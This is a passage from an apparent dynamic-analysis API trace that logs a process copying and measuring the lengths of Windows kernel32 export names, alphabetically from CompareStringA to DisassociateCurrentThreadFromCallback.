lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.039] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.039] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.039] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.039] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.039] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.039] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.039] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.039] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.040] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.040] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.040] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.040] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.040] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.040] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.040] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.040] lstrlenA (lpString="COPYFILEA") returned 9 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.040] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.040] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.040] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.040] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.040] lstrlenA (lpString="COPYFILEW") returned 9 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.040] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.040] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.040] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.040] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.040] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.041] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.041] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.041] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.041] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.041] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.041] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.041] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.041] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.041] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.041] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.041] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.041] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.041] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.041] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.041] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.041] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.041] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.041] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.041] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.042] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.042] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.042] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.042] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.042] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.042] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.042] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.042] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.042] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.042] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.042] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.042] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.042] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.042] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.042] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.042] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.042] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.042] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.042] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.043] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.043] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.043] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.043] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.043] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.043] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.043] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.043] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.043] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.043] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.043] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.043] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.043] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.043] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.043] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.043] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.043] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.044] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.044] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.044] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.044] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.044] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.044] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.044] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.044] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.044] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.044] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.044] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.044] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.044] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.044] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.044] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.044] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.044] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.044] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.045] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.045] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.045] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.045] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.045] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.045] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.045] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.045] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.045] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.045] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.045] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.045] lstrlenA (lpString="DELETEATOM") returned 10 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.045] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.045] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.045] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.045] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.045] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.045] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.046] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.046] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.046] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.046] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.046] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.046] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.046] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.046] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.046] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.046] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.046] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.046] lstrcpyA (in: 